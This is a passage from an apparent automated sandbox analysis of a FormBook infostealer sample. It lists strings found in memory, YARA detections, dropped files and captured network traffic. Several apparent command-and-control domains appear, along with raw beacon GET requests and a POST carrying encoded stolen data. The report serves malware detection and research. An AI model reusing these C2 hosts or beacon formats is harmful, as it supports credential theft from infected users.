          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mazinhoccb.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.393919703.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398187272.000000000578D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398367935.000000000578D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398296937.000000000578D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.com/co63/www.takealicense.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.comReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyz
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyz/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyz/co63/www.mattewigs.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyzReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.com/co63/www.creativebrea.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387837697.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com-
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387823212.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comu
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.com/co63/www.ballthingsez.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.com/co63/www.naspewt.xyz
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.com/co63/www.saleschildcarriers.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnvaB
          Source: unknownHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.vestostore.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.vestostore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vestostore.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 32 38 41 5a 59 73 77 35 63 54 4c 46 6c 6c 7e 72 63 52 6a 69 53 52 72 50 52 52 64 4c 4f 4b 68 33 59 31 47 67 56 6d 7a 76 79 42 34 68 63 52 69 68 6d 56 30 6d 52 74 37 30 47 41 76 6d 76 78 75 31 7a 38 59 68 77 37 42 48 6f 36 4e 4d 71 71 6a 34 71 35 50 61 53 73 72 71 76 5a 71 63 62 68 54 39 34 6b 59 70 6f 4c 28 6c 35 7a 4b 46 33 35 63 6f 52 61 41 44 30 46 35 75 4c 4a 66 71 28 6c 48 53 63 54 56 70 36 74 69 56 6d 43 54 33 67 38 33 54 35 36 58 6b 64 38 62 50 57 70 78 72 66 59 76 5a 6c 61 74 67 4c 66 32 50 41 4f 38 39 63 67 32 51 4a 63 4c 5a 57 57 72 2d 59 6f 28 41 6a 78 4d 70 75 79 65 50 6e 41 5a 4c 63 46 54 49 45 6f 4d 32 28 68 77 37 6b 69 69 6b 49 6d 71 79 53 75 4a 35 79 30 71 46 37 4d 6d 6b 7a 62 4c 55 65 6f 70 46 68 79 6b 7a 28 34 66 7a 6c 4b 51 30 35 55 4e 39 61 69 79 64 5a 4d 68 48 30 4e 68 5a 45 6d 56 34 31 5a 61 70 71 42 5a 6c 47 69 67 4e 78 52 69 6d 30 71 78 7a 42 57 74 57 41 52 73 48 74 38 75 73 6d 30 52 33 68 58 53 57 75 42 6f 5a 70 50 61 72 6b 4c 77 75 55 54 6a 6d 6f 47 59 77 4d 72 75 50 35 4a 33 35 4e 71 68 47 7e 31 32 62 58 6d 46 6f 35 56 52 54 65 37 67 43 59 69 70 66 53 63 33 35 37 54 6c 7a 42 34 35 55 58 2d 4f 4d 7a 6a 33 49 28 63 62 55 61 72 55 77 76 73 66 72 41 62 33 79 73 79 34 72 77 2d 70 61 37 72 6b 5a 71 63 62 42 4e 4d 45 32 6b 71 73 6e 55 66 6f 74 6a 69 64 39 50 43 67 6f 45 30 38 5a 36 79 4b 6e 45 6d 76 4a 62 5f 6c 59 46 68 57 53 4d 6c 48 45 6f 34 79 2d 28 51 6d 59 43 4b 4d 4a 45 32 4c 46 5a 77 65 63 4e 6f 6a 76 33 43 43 70 68 54 38 79 4c 59 56 57 67 70 49 55 54 4b 32 53 33 34 69 37 6f 48 50 6f 42 34 73 4a 46 58 76 4c 51 6f 34 63 41 5a 76 77 6c 63 44 48 64 67 36 62 43 59 51 44 67 37 6d 6f 6e 66 33 54 46 6e 79 56 7a 56 28 79 38 7a 59 79 6a 73 6d 77 6b 7a 32 5a 72 56 34 49 30 39 79 4b 69 53 5a 68 62 74 43 57 61 48 43 36 61 50 5a 77 54 6d 70 51 42 75 37 58 66 74 28 39 55 31 4f 68 73 71 70 5a 67 7a 5a 43 50 4a 33 39 42 36 34 4d 43 6d 69 58 62 38 69 64 53 31 64 67 36 68 64 79 42 30 6f 32 7e 6e 5a 5f 56 47 64 74 50 37 57 62 33 69 67 47 34 50 38 53 59 6d 34 53 47 46 32 42 35 4c 47 58 65 6b 49 58 78 41 37 37 5a 63 30 42 71 50 31 58 6f 66 34 63 36 33 70 4e 68 59 43 76 38 62 34 62 36 61 6b 58 67 2d 51 6a 74 31 6b 55 4b 73 58 74 75 36 51 45 65 61 36 6f 79 6f 46 47 66 6a 28 45 47 56 68 6a 4a 74 32 46 31 69 41 6e 47 39 6b 73 69 35 33 7a 69 43 37 4b 61 48 7a 47 7a 69 78 54 62 38 42 4f 6b 53 32 76 74 30 4e 34 46 71 6a 36 78 65 51 49 61 4c 4d 6a 4e 33 57 36 51 43 6c 4f 6c 56 44 47 68 62 39 49 69 4f 4a 4e 59 32 49 76 6e 6d 34 78 28 72 44 38 35 45 70 42 56 77 4f 46 78 4a 4b 6b 6d 6a 39 35 68 7a 4a 64 4a 69 56 51 32 79 5a 62 59 4
          Source: unknownDNS traffic detected: queries for: www.vestostore.com
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.vestostore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.saleschildcarriers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.ballthingsez.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=7844uNirl1OmKo/iz3P/xC/n+TlWcrf11+et7B27/2a6MTbhGvfvyecJXVPFAq5Jbxq/&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.dlafluid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.myccsmartmove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.takealicense.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.mattewigs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.426300401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Detected FormBook malware
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\479O54QF\479logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\479O54QF\479logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
